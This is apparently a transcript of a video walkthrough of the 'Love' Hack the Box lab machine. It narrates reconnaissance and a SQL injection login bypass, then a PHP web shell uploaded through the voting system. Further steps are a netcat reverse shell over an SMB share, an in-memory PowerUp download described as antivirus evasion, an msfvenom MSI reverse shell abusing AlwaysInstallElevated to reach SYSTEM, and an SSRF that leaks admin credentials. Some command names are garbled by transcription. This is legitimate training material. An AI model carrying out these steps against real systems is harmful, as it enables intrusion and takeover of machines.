Hey, what's up everybody, here's Matsick once again. Today we're gonna be rooting love from Hack the Box, and as always I've just started with an nmap scan, so I'm gonna walk you through the whole command I used. And basically use the tag pn option to tell the host nmap the host is already up and running. Tag sv that adds this version column right here, and the C appended to it is just a shorthand for the tag is C option, just as the SV, and you can just squeeze it in and it'll work just fine. But what it does is that it performs several script like default script checks on every port it finds. So for example, for HTTP based ports, it performs, for example, this HTTP server header. Here we have another HTTP, so HTTP server header once again, and once again here. So that's it. Obviously for other kind of port you will perform different kind of scripts, but yeah, it's a super useful feature nmap has. So we also have tag N to disable DNS resolution, and tag P tag will perform a scan on the whole range of ports that are available on the TCP/IP protocol, which is from 1 to 65,535. Also a minimum rate of 500 packets a minute. Since we are in over a VPN, the communication is kind of slow, so that this will help a lot. Now there are some people that uses 5,000 packets, but in my experience that doesn't work. It just loses a lot of information in packages and it's not worth it. And finally the ON to save the output to a file called general on inside a directory named nmap and IP. So onto the result, we have here the HTTP, an HTTP port hosting Apache 2.4.46 for Windows 64 bits on port 80. I've already opened it and we'll go over it in a minute. We also have 135 and 445 here for SMB, so we might go check it out right now. And let me define a variable t with my target IP so that I can invoke it with the $t. Now there's an authentication error. Let me try a null attack, and we don't have the credentials just yet. So in the meantime, we also have the 139 for NetBIOS SSN. There's nothing we can do with that. And we have a 443. So let me check this in here. This is actually over SSL. And bad request, that is because we need to specify the HTTPS instead of this. That will do better. And since this is a self-signed certificate, SSL certificate, we need to accept the risk and continue. It's not secure. I mean, anyone can create certificates, just that they will be self-signed and not by a respected certified authority, CA, right? So if we come here, we'll see forbidden. But look at this. The nmap script engine has already gathered some information from us, but we can do it manually anyway. And if we go here to the lock, we will see information about the certificate. So more information, view certificate, and we see we have a virtual host of staging.love.htb. So we definitely want to add that to our local DNS server, which is etc hosts file, right? So we need to add the target IP and the staging.love.htb and the love.htb itself. Now note that these domains are different. So it's not the same to enter love.htb and staging.love.htb. And if you notice, if I hit enter here, we will be redirected to Google. And in order to go to the URL, I just need to add a / that will take me somewhere else. So look at the differences, right? So this is the voting system, and this is, well, a free file scanner, secure file scanner, Valentine Corporation. Let's just keep looking at the certificate information. Where was it? Here. And locality, Norway, Valentine Corp, Roy at love.htb. So we already have an user. And well, basically that's it. So let me close this up. And what else do we have here? So we have a 3306 port for MySQL, but it says host 10.10.14.4. That is us, is not allowed to connect to this MariaDB server. So that's bad. So basically we have two pieces of information here, that we're using MariaDB, and well, basically that we're not allowed to connect to this service. We also have a 5000 service, like 5000. Let's see what's there. Forbidden as well. So now we have two ports that are forbidden. And we have 5040, 5985, which is WinRM, 5986, which is WinRM over SSL, if I'm not wrong, and a lot of other ports that I encourage you to look up on Google, but we'll do with what we have already. So here, what I like to do, for example, is to start fuzzing, like FFUF. I'm going to be using this. So FFUF is fuzz faster you fool. It's my preferred tool for fuzzing. There are others like Ferox Buster, Go Buster, Derp Buster, and WFUZZ, WFuzz. But anyway, FFUF, tag C for colored output, tag U for our IP. Here is the IP being invoked. The fuzz, this is the keyword that the program itself will take. We'll have into account to put every word of the word list we pass it on, right? So we have tag W for the word list. I'm going to be using from their Buster word lists, directory list 2.3 medium, and 200 threads. So when I do this, we will see several pieces of information here. You can see admin 3 times in a row, all lowercase, one with capitalized A, and all in caps. That is because in Windows, and you can use your Webalizer extension to wrap information about the host that is running this website. Windows server. So in Windows, basically, like, files and directories are not case insensitive, so they will be cached either by doing something like this or just all lowercase, and that's the same. Now I note here that it says voters ID password, and then here it says username and password. So I don't know, let me try with Roy, for example, that we saw in the certificate. Roy, and it says cannot find account with the username. So this is kind of like an informational level finding, because apparently this will allow us to enumerate users, right? So admin is the incorrect password. So now we know that there's a user, valid user in the system, right? So before moving on onto the next thing, I'm gonna be checking the source code just to see if this is some kind of framework or of custom software or whatever I might have, and I don't see anything like interesting here. However, I like to search like the word, what is it, voting system, for example, in the exploit DB database with search exploit, right? So look at this. So I have an online voting system and a voting system 1.0. And I'm not really sure what the difference is, but we'll try with this first, and if not, we'll move on to the online version. And it says authentication bypass SQLI authenticated RCE, remote code execution unauthenticated, time-based SQLI. Okay, so let us check first the authentication bypass, and I can do that with search exploit.x as an examine. And let's read it. So it says you can simply bypass the admin login.php. That's where we are right now. And here's like the payload that it's passing on as a request. So if I come here and inspect, I can see the network tab, send a request, and check what are the fields that are being sent over post. And here, so request, username, password, login, and apparently to this thing here I need to use login, yeah, and then password. Let me try this first. Okay, password admin and username this. So let me try this here, and then here admin or whatever, and I'm inside of it, right? But that's super cool. And I'm inside the dashboard. I have Neovic DVRD, voters, positions. Let me check that. Positions, candidates, ballot position, election title. It looks like there's no information in here. So let me keep looking at this. Now that we are authenticated, maybe we can file upload RCE. That sounds good. And it's a pi. So no, yeah, it's a pi. So remote code execution unauthenticated. For example, let me read this now. So search exploit, again examine this one, and it says unauthenticated file upload is possible via admin candidates add.php that we can use for RCE. So apparently there's a broken access control, and there's a functionality here, for example, candidates, where even unauthenticated we can add a candidate, right? Candidates add.php and upload here as a photo. I mean, we have arbitrary file upload, so we can upload a PHP shell. And position was this. Looks like our let's see, tester, save. Please select an item. Yeah, so we have no option here, so let me just go ahead and create it here in positions. Whatever, tester, and 3 maximum votes. I don't know what that is. Let's go back to candidates list. New. So tester, position, tester, photo. Okay, so nano shell.php. I'm gonna be creating a PHP web shell. Yes, this is the format. I'm going to be using echo and then system at first. Obviously, there are other kind of functions we can use, such as exec, I mean system exec, shell exec, pass through, a lot of them. And in order to create a dynamic a dynamic web shell we can pass commands on to, we just need to specify the keyword get, and in between square brackets I'm going to be specifying cmd right? So now I'm gonna copy shell and send it to my downloads folder. That's because I have already a shell created by root. So shell1.php and downloads shell1.php. Let me upload it. Well, let's see, I see my information here in a photo field. So let me right click it and open image in new tab. And wow, it says undefined index command in C champ omrs images shell1.php. System cannot execute a blank command. So it is actually interpreting the PHP code. It's just that we haven't passed the command yet. So how do we do that? We can basically add a question mark in here, then add a parameter over get, and then equals who am I, for example. And this is kind of ugly, but we can confirm that we have remote command execution. Now to see it like prettier, we can just hit Ctrl U to see the source code, and you'll see that, I mean, the command executes twice, but this is just fine. So net user, for example, and this works just fine. We can see like a very understandable shell or reflect of the shell, so that's good. And in order to gain my initial foothold in the machine, I'm going to do add with netcat. So let me go to exploits, let me locate nc.exe, and look at that, we have two locations. I'm gonna copy it here, and with this in mind, I'm gonna be doing the following. So ncmvlp 4444, that's at first, and I'm gonna be creating a SMB server. So in packet SMB server, I'm gonna be naming the folder as folder, and I'm gonna be using a dot just to specify that I want the folder to be initialized in here, and in this very location I'm currently at. And I can add a flag called SMB2 report, I think it is. Yeah, there you go. So now we have an SMB server without authentication, so that's all right. And in order to communicate with this, I'm gonna be using just as I would do in a CMD shell, 10.10.14.4, that's my IP and folder, and nc.exe. Now I'm gonna be using tag E to specify the kind of program I want to send over the network. In this case, cmd.exe, then my IP, and then the port, right? I'm gonna hit enter, and look at that. So basically, love.htb is communicating to my SMB server, is authenticating, and it's executing the netcat from my machine and sending me a reverse shell right in here. So that's cool. And actually I cannot Ctrl L, so let me close this and do it again with rl rep with option C, A, capital A and R, just like that. I'm gonna be executing it again, just like that. It will authenticate again. And actually this hash you see over here, we can try to crack it. So I didn't try before, but it's fine, right? So nano hash and John hash, just like that. We'll see if we can have a password. I'm gonna be using timeout. Oh, timeout. I don't know, 1,000 seconds is fine. So if it takes longer than 1,000 seconds, it will just quit. So who am I? Okay, it ran out of options from the rockqt.txt, so we can suppose that BB, it's using a strong enough password, so that's cool. So who am I? Oh, again, net user, for example, here. Let's go to our C users, like that, and there. So look at what I'm going to do now. So Well, let's go to Phoebe first, and I'm going to be using there /s/b/a colon -d -h, and I'm specifying this very same location, and I'm going to be piping it to a find string /i/v app data Microsoft VMware cache, a lot of stuff. So basically what this is doing is looking at every file recursively from the position we specified, that is the very same directory we're at. And find string is like a grep with an case insensitive flag and a v in order to grep out, right? So it will not include results with this strings in it. So let us run that, and right off the bat we just cached, sorry, that was bad. I just caught my user.txt flag. I'm not a native speaker, so forgive me for that. So I can go ahead and type desktop user.txt. There you go, there's our first flag. Now obviously it's recommended to run a very thorough manual privilege escalation audit or check by yourself, but in this case, in order just to explain the machine, we're just gonna go straight away with the way we need to escalate our privileges, right? So there's a pretty cool script, PowerShell script, that we can use for privilege escalation checks, which is PowerUp, right? So for this, I'm going to be using user share Windows resources, and then we have power exploiting here. Inside we have a lot of options: persistence, exfiltration, mayhem, code execution, antivirus, bypass, privesc, recon, script modification, test. Obviously we are interested into the privesc thing, and here we have PowerUp. So I'm gonna copy this as pop.ps1, sorry, just to keep it in mind, right? Keep it simple. So I'm gonna be using a HTTP server on port, doesn't matter, because I don't want to use my sudo command here. I'm gonna be using, actually I need to go to a PowerShell session. So there you go. From here, I want to use the following. I'm going to invoke an expression, and inside of it, I need to create a new object with a net web client instance. This is not case insensitive, but I'm just typing it like capitalized just for you to understand this. And here I'm going to be using download string, and I'm going to be using a link here. So in between apostrophes, simple apostrophe. So HTTP and 10.14.4 over port 8000, then pop.ps1. We'll see right away a 200 GET request in here, or response, better said. Hopefully. Let's see, it's taking a long time to do it. There you go. And you'll see, okay, did you download anything? No, I didn't. Look at this. There is no pop ps1 in here, because what this command does, this downloads it and loads it into memory, not into disk. And that's, I mean, kind of a way to evade antiviruses or technically speaking. Obviously, in an environment fully protected with Windows Defender activated and a lot of stuff, if you don't do your obfuscation job or tasks, it will get caught, right? Obviously it will right away, but this is a controlled environment, so this works as a demonstration, right? So okay, load into memory, and now we can run something called invoke all checks that will perform everything it gets. Sorry, I don't know what's wrong with me today, so it'll do everything it can. everything in their functionality, right? So invoke, and we can also use another one, which is previous audit. So let's do that. And let's see what's going on in here. So there's a path which is fully quoted, so that's all right. Install service binary name HTB. Okay, so apparently I can modify something in this service as well as in here. All these three, which are from a Edge update end. It looks like the software in charge of updating Microsoft Edge, right? Or former Internet Explorer. And we have another one here, which is a DLL hijacking option to hijack WLPSCTRL.dll. And look at this. Also, we have another check, which is always install elevated register key. So what this means is that we can create a .msi file, a installer file, and have it executed as NT authority system. That is basically just root in Linux systems, right? That is the best we can do here. So that is interesting indeed. And I'm gonna be going to app data, local temp, just in order to be sneaky. And here I'm gonna be creating a something super sneaky, like something like this. No one will ever find out, right? So let me go to this folder, and here I'm gonna do something now in my VM. First of all, we need to create a malicious MSI that contains a reverse shell back to us, right? So I'm gonna be using MSF Venom. I'm gonna be specifying a payload with tag P. I'm gonna be using Windows x64 shell reverse TCP. And with that, I'm going to be specifying an L host, which is going to be ton0. You can specify your interface. Ton0 is the interface that holds the hack the box VPN. And I'm going to be using L port as well. So L port, it's going to be 3333. I'm going to be using a format file, which is MSI, and it will output it to a file called reverse.msi. So that will do it. Okay, so now we have a reverse.msi, and we just need to download it onto disk this time. So how do we do that? Well, we have an option with a tool called certdetail.exe, and I'm using F, URL cache, and split. HTTP 10.10.14.4 8000 reverse.msi. That will effectively download it now into disk. You see this? And pay attention here, because there's a very specific way to execute this in order to grant us shell or administrator access. And before that, let's fire up our netcat listener on port 3333. And the way is msi exec quiet qni msi reverse.msi. That will execute it. Basically what this does is to avoid like making the program or the executable pop up to the eyes of the user, you know. So now who we are, it's anti-authority system. That's nice. So let's go to CD, to C, users, administrators. Sorry, I didn't use RL rep, so users administrator, right? So there, and I can their desktop, and there's a root flag, so type desktop root.txt, there's her flag. Now before we wrap up this video, I'm gonna be showing you another way around this, kind of another path that we didn't explore. So here in the secure file scanner, let us go to demo in here. Now look at this. So it says specify the file URL. So at this point, what you would do is basically try an server-side request forgery here as http:10.10.14.4 on, let's try it, well, port 80,000. And well, hopefully for us, thankfully our Python web server is already up and running. So I'll get whatever, so scan file, and look at this, it's doing the request on our behalf. 404 not found. It says error response, error code 404, message file not found. So that is interesting because with a server-side request forgery, we can get to local places or pages or sites we didn't have access to, such as these two, right? So we have a photo 3 forbidden, it's forbidden, right? So what about we trying to access it? So https, let me just copy this IP here, https, and there is no information in here. And what about the 5000? So http 5000, copy it just in case. Scan file, you don't have permissions to access this resource. Okay, fair enough. But what about if we try to use 127.0.0.1? That is the local host. That is, we the server are asking ourselves, localhost, hey, give me the information or the files hosted on port 5000. Will that work? Should be, and it does. Look at this. So we as outsiders, we can see it, we can access it, but they do, right? They are querying themselves, they are asking themselves, hey, can I do this? Yes, you can. So here we have both admin creds, admin and at love is in the air, and 4 exclamation marks. So that's good. So what would you use this? First, to gain access to this dashboard, and second, because if you check this, you're gonna be oh my god, search Lloyd voting system, just like that. And one of these, I think it's this one, search Lloyd M, and let me ls 49. So you need to to put here your username, that would be admin, was it? Yes, admin, and here's password, love this in the air. And I think actually that this kind of bugged this script, so you would need to change some things. For example, let me check. Yeah, I don't see it. Maybe the URL or something like that. Yeah, here the URLs are hosted on the vote system file directory that doesn't actually exist in our case, so we just need to remove that, strip that off of the whole URLs, and that should work. And that was the path, one of the intended paths we didn't talk about in the whole video, but there it is, right? So I'm gonna be wrapping it up right in here, and I hope you guys liked it as much as I did. It was pretty interesting machine. It's an easy level 1, but according to some reviews, it appears to be more of a medium, right? Medium level difficulty. And yes, that's it. So thank you for joining, and I'll see you later.